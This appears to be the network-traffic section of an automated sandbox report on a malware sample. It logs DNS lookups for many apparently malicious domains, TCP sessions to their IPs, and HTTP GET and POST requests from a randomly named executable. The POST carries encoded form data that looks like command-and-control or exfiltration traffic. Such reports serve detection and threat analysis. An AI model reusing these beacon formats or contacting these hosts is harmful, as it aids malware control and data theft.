                                                                        Nov 28, 2024 09:16:30.096688032 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.216711998 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:30.216979980 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.232676029 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:30.352854013 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:30.352876902 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:31.380040884 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:31.380093098 CET805002152.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:31.380140066 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:31.732722044 CET5002180192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:32.751912117 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:32.871934891 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:32.872029066 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:32.883420944 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:33.003460884 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075501919 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075728893 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075742960 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.075876951 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.076488018 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.076514959 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.076548100 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.077272892 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.077286959 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.077404022 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.078151941 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.078170061 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.078190088 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.078825951 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.078885078 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.195972919 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.196161032 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.196289062 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.200058937 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.248198986 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.285759926 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.285862923 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.288250923 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.288311005 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.288434982 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.288678885 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.295603037 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:34.295717955 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.296807051 CET5002280192.168.2.552.60.87.163
                                                                        Nov 28, 2024 09:16:34.416754007 CET805002252.60.87.163192.168.2.5
                                                                        Nov 28, 2024 09:16:39.894968033 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:40.015450001 CET8050023161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:40.015559912 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:40.030689955 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:40.150796890 CET8050023161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:41.545133114 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:41.665680885 CET8050023161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:41.665739059 CET5002380192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.570051908 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.690270901 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:42.691138029 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.705497026 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:42.825557947 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.983979940 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.983995914 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.984006882 CET8050024161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:43.984150887 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:44.217026949 CET5002480192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.237402916 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.357377052 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:45.357470036 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.385179043 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:45.505238056 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:45.505254030 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.601273060 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.601397991 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.603797913 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:46.681910038 CET8050025161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:46.682034016 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:46.888840914 CET5002580192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:47.907850027 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:48.028002024 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:48.028162956 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:48.036974907 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:48.157043934 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317785025 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317852020 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317867041 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.317982912 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.318216085 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.318232059 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:49.318252087 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.318273067 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.323235989 CET5002680192.168.2.5161.97.142.144
                                                                        Nov 28, 2024 09:16:49.443244934 CET8050026161.97.142.144192.168.2.5
                                                                        Nov 28, 2024 09:16:55.096431971 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:55.216461897 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:55.216543913 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:55.232443094 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:55.352555990 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:56.359009981 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:56.364696980 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:56.748333931 CET5002780192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:56.868422985 CET805002775.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:57.766808033 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:57.886887074 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:57.886985064 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:57.901714087 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:58.021796942 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:58.982846975 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:16:58.982904911 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:59.405328989 CET5002880192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:16:59.525397062 CET805002875.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:00.424679041 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:00.544770002 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:00.547096014 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:00.562285900 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:00.682440996 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:00.682457924 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:01.737070084 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:01.737260103 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:02.079713106 CET5002980192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:02.199908018 CET805002975.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:03.105755091 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:03.230535030 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:03.230614901 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:03.241503000 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:03.362236023 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:04.372782946 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:04.372929096 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:04.373017073 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:04.379429102 CET5003080192.168.2.575.2.103.23
                                                                        Nov 28, 2024 09:17:04.499381065 CET805003075.2.103.23192.168.2.5
                                                                        Nov 28, 2024 09:17:10.332314014 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:10.452425957 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:10.452539921 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:10.467845917 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:10.587856054 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:11.553766966 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:11.556796074 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:11.990092039 CET5003180192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:12.110240936 CET805003113.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:13.391645908 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:13.511795998 CET805003213.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:13.511893034 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:13.527771950 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:13.647803068 CET805003213.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:14.658343077 CET805003213.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:17:14.660402060 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:15.029489040 CET5003280192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:17:15.149465084 CET805003213.248.169.48192.168.2.5

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 28, 2024 09:13:50.071640968 CET5402253192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:13:50.721270084 CET53540221.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:14:07.320281029 CET4931853192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:14:08.100286961 CET53493181.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:14:22.506067991 CET6044953192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:14:23.008953094 CET53604491.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:14:37.423585892 CET6147153192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:14:38.257184982 CET53614711.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:14:52.817841053 CET6541853192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:14:53.213967085 CET53654181.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:15:07.471225977 CET6367553192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:15:07.789583921 CET53636751.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:15:22.064675093 CET6338953192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:15:22.413882017 CET53633891.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:15:36.893942118 CET6343953192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:15:37.847088099 CET53634391.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:15:53.720443010 CET5788153192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:15:54.205032110 CET53578811.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:16:09.062171936 CET6314753192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:16:09.599001884 CET53631471.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:16:24.112025976 CET5995253192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:16:24.758555889 CET53599521.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:16:39.315839052 CET5758653192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:16:39.891660929 CET53575861.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:16:54.332684994 CET6475153192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:16:55.093492031 CET53647511.1.1.1192.168.2.5
                                                                        Nov 28, 2024 09:17:09.392362118 CET5190653192.168.2.51.1.1.1
                                                                        Nov 28, 2024 09:17:10.069999933 CET53519061.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 28, 2024 09:13:50.071640968 CET192.168.2.51.1.1.10xbbf7Standard query (0)www.holytur.netA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:07.320281029 CET192.168.2.51.1.1.10x29deStandard query (0)www.nieuws-july202488.sbsA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:22.506067991 CET192.168.2.51.1.1.10xa29Standard query (0)www.losmason.shopA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:37.423585892 CET192.168.2.51.1.1.10x6b10Standard query (0)www.hayaniya.orgA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:52.817841053 CET192.168.2.51.1.1.10x77a9Standard query (0)www.lovel.shopA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:07.471225977 CET192.168.2.51.1.1.10xf48fStandard query (0)www.duskgazes.workA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:22.064675093 CET192.168.2.51.1.1.10xb86fStandard query (0)www.zrinorem-srumimit.sbsA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:36.893942118 CET192.168.2.51.1.1.10xd076Standard query (0)www.6822662.xyzA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:53.720443010 CET192.168.2.51.1.1.10x72b8Standard query (0)www.lingdianyun29.xyzA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:09.062171936 CET192.168.2.51.1.1.10x914aStandard query (0)www.learnnow.infoA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:24.112025976 CET192.168.2.51.1.1.10x2d9eStandard query (0)www.carpentry.clubA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:39.315839052 CET192.168.2.51.1.1.10x41cStandard query (0)www.030002449.xyzA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:54.332684994 CET192.168.2.51.1.1.10x1dd7Standard query (0)www.innovationpulse.techA (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:17:09.392362118 CET192.168.2.51.1.1.10xfa54Standard query (0)www.hasan.cloudA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 28, 2024 09:13:50.721270084 CET1.1.1.1192.168.2.50xbbf7No error (0)www.holytur.netholytur.netCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 28, 2024 09:13:50.721270084 CET1.1.1.1192.168.2.50xbbf7No error (0)holytur.net185.106.208.3A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:08.100286961 CET1.1.1.1192.168.2.50x29deNo error (0)www.nieuws-july202488.sbsnieuws-july202488.sbsCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:08.100286961 CET1.1.1.1192.168.2.50x29deNo error (0)nieuws-july202488.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:23.008953094 CET1.1.1.1192.168.2.50xa29No error (0)www.losmason.shop104.18.73.116A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:38.257184982 CET1.1.1.1192.168.2.50x6b10No error (0)www.hayaniya.orghayaniya.orgCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:38.257184982 CET1.1.1.1192.168.2.50x6b10No error (0)hayaniya.org192.185.147.100A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:53.213967085 CET1.1.1.1192.168.2.50x77a9No error (0)www.lovel.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:14:53.213967085 CET1.1.1.1192.168.2.50x77a9No error (0)www.lovel.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:07.789583921 CET1.1.1.1192.168.2.50xf48fNo error (0)www.duskgazes.workduskgazes.workCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:07.789583921 CET1.1.1.1192.168.2.50xf48fNo error (0)duskgazes.work3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:07.789583921 CET1.1.1.1192.168.2.50xf48fNo error (0)duskgazes.work15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:22.413882017 CET1.1.1.1192.168.2.50xb86fNo error (0)www.zrinorem-srumimit.sbs172.67.222.69A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:22.413882017 CET1.1.1.1192.168.2.50xb86fNo error (0)www.zrinorem-srumimit.sbs104.21.38.113A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:37.847088099 CET1.1.1.1192.168.2.50xd076No error (0)www.6822662.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:15:54.205032110 CET1.1.1.1192.168.2.50x72b8No error (0)www.lingdianyun29.xyz121.43.155.35A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:09.599001884 CET1.1.1.1192.168.2.50x914aNo error (0)www.learnnow.info199.192.23.123A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:24.758555889 CET1.1.1.1192.168.2.50x2d9eNo error (0)www.carpentry.club52.60.87.163A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:39.891660929 CET1.1.1.1192.168.2.50x41cNo error (0)www.030002449.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:16:55.093492031 CET1.1.1.1192.168.2.50x1dd7No error (0)www.innovationpulse.tech75.2.103.23A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:17:10.069999933 CET1.1.1.1192.168.2.50xfa54No error (0)www.hasan.cloud13.248.169.48A (IP address)IN (0x0001)false
                                                                        Nov 28, 2024 09:17:10.069999933 CET1.1.1.1192.168.2.50xfa54No error (0)www.hasan.cloud76.223.54.146A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.holytur.net
                                                                        • www.nieuws-july202488.sbs
                                                                        • www.losmason.shop
                                                                        • www.hayaniya.org
                                                                        • www.lovel.shop
                                                                        • www.duskgazes.work
                                                                        • www.zrinorem-srumimit.sbs
                                                                        • www.6822662.xyz
                                                                        • www.lingdianyun29.xyz
                                                                        • www.learnnow.info
                                                                        • www.carpentry.club
                                                                        • www.030002449.xyz
                                                                        • www.innovationpulse.tech
                                                                        • www.hasan.cloud

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549772185.106.208.3802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:13:50.858181953 CET541OUTGET /cs9k/?QhKxhNP=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gpP2tZDtQplym5WCIjSXUngUJeAz/nR33NA1XQvWBI8EpRg==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.holytur.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:13:52.244767904 CET304INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:13:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549809162.0.215.33802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:08.244015932 CET823OUTPOST /30le/ HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.nieuws-july202488.sbs
                                                                        Referer: http://www.nieuws-july202488.sbs/30le/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 75 45 52 34 56 6a 65 73 6f 56 4c 6c 4c 44 74 45 67 43 59 76 34 42 71 41 46 4a 34 6f 2f 6f 47 75 58 44 52 4c 37 51 3d
                                                                        Data Ascii: QhKxhNP=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSuER4VjesoVLlLDtEgCYv4BqAFJ4o/oGuXDRL7Q=
                                                                        Nov 28, 2024 09:14:09.541932106 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 28 Nov 2024 08:14:09 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 1352ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
